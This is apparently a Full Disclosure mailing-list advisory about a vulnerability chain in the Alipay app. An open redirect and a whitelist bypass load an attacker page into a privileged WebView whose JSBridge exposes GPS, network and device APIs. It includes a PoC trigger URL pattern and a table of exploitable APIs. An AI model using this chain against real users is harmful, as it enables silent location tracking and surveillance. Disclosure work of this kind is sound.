Alipay DeepLink+JSBridge Attack Chain: Silent GPS Exfiltration, 17 Vulns, 6 CVEs (CVSS 9.3)

[Feng Ning via Fulldisclosure <fulldisclosure () seclists org>]

Subject: Alipay DeepLink+JSBridge Attack Chain: Silent GPS Exfiltration, 17 Vulns, 6 CVEs (CVSS 9.3)

# Alipay DeepLink + JSBridge Attack Chain
# Silent GPS Exfiltration via Crafted URL

## Overview

Researcher: Jiqiang Feng / Innora AI Security Research
Vendor: Ant Group (蚂蚁集团) / Alibaba Group
Product: Alipay (支付宝) v10.x (Android & iOS)
Users Affected: 1 billion+
CVEs: 6 submitted to MITRE CNA-LR (2026-03-12)
CVSS: 7.4–9.3
Vendor Response: "Normal functionality"
Disclosure: Responsible (Feb 25 → Mar 11 public)

## Vulnerability Chain

A single crafted URL triggers the following attack chain:

1. Open Redirect (CWE-601): ds.alipay.com/?scheme= accepts arbitrary URL parameters, redirecting to Alipay app via deep 
link
2. Whitelist Bypass (CWE-939): ds.alipay.com is a whitelisted Alipay domain, so the deep link handler trusts the 
redirect target
3. WebView Loading: Attacker-controlled page loads in Alipay's privileged WebView with JSBridge access
4. API Abuse: AlipayJSBridge.call() exposes sensitive native APIs without user consent

## Exploitable APIs (Verified)

| # | API | Data Extracted | Android | iOS |
|---|-----|---------------|---------|-----|
| 1 | getLocation | GPS coords (8.8m accuracy) | ✓ | ✓ |
| 2 | getNetworkType | WiFi/cellular, carrier info | ✓ | ✓ |
| 3 | getSystemInfo | Device model, OS, screen | ✓ | ✓ |
| 4 | getCameraPermission | Camera auth status | ✓ | ✓ |
| 5 | getMicrophonePermission | Mic auth status | ✓ | ✓ |
| 6 | tradePay | Pre-fill payment screen | ✗ | ✓ |
| 7 | share | Trigger share dialog | ✗ | ✓ |
| 8 | scan | Activate QR scanner | ✗ | ✓ |
| 9 | chooseImage | Access photo picker | ✗ | ✓ |

iOS attack surface is significantly larger than Android.

## PoC

Trigger URL pattern:
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=[BASE64_ENCODED_ATTACKER_URL]

Verification page (read-only, no data collection):
https://innora.ai/zfb/poc/trigger.html

## Verification

- 3 devices: Samsung S25 Ultra (NZ), Xiaomi Redmi 12 (MY), iPhone 16 Pro (CN-Hangzhou)
- 308 server-side exfiltration logs
- 42 screenshots
- Vendor's own security lead tested on iPhone from Hangzhou (Alipay HQ) — GPS captured silently in 7 seconds, accuracy 
8.8m

## Timeline

2026-02-25: Initial TLS/SSL report to vendor
2026-03-06: Vendor: "cannot be practically exploited"
2026-03-07: Expanded report (17 vulns, full E2E proof)
2026-03-07: Whitelist bypass achieved in 2 min during live call with vendor
2026-03-08: Vendor's security lead's iPhone tested from Hangzhou — GPS captured
2026-03-10: Vendor final: "normal functionality"
2026-03-11: Public disclosure
2026-03-11: Vendor's law firm files takedown complaint (4 hours later)
2026-03-12: 6 CVEs submitted to MITRE

## Full Report

https://innora.ai/zfb/ (bilingual EN/ZH)

## Notes

- Alibaba is a registered CNA (CNA-2017-0006) but refused to assign CVEs
- Vendor's law firm complaint targets an article that never once mentions "Alipay" or "Ant Group" by name
- Vendor's security contact privately called it a "洞" (hole/vuln) while officially classifying as "normal functionality"

## Contact

Jiqiang Feng | feng () innora ai | Innora AI Security Research

Attachment: publickey - Jiqiang Feng - 0x7D1A285E.asc
Description:

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/